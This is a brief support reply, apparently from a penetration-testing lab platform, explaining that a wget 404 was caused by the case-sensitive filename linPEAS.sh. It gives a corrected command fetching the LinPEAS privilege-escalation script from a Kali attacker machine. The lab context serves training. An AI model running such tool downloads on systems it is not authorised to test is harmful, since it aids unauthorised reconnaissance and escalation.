👋 posewadone
Thanks for sharing your steps, that made troubleshooting a lot easier! I've just taken a look at the lab, and it looks like you might be getting the 404 error because downloading files with wget is case-sensitive, and the LinPEAS script is actually called linPEAS.sh, not linpeas.sh.
I've updated the lab's briefing panel, so the example command now reflects this correctly:
wget http://[Kali Desktop IP Address]:8000/LinPEAS/linPEAS.sh
Just make sure you update the placeholder with the Kali Desktop's actual IP address, and you should be good to go!
I hope this helps, but please reach out if you're still struggling, and I'll see if there's anything else I can help with 😁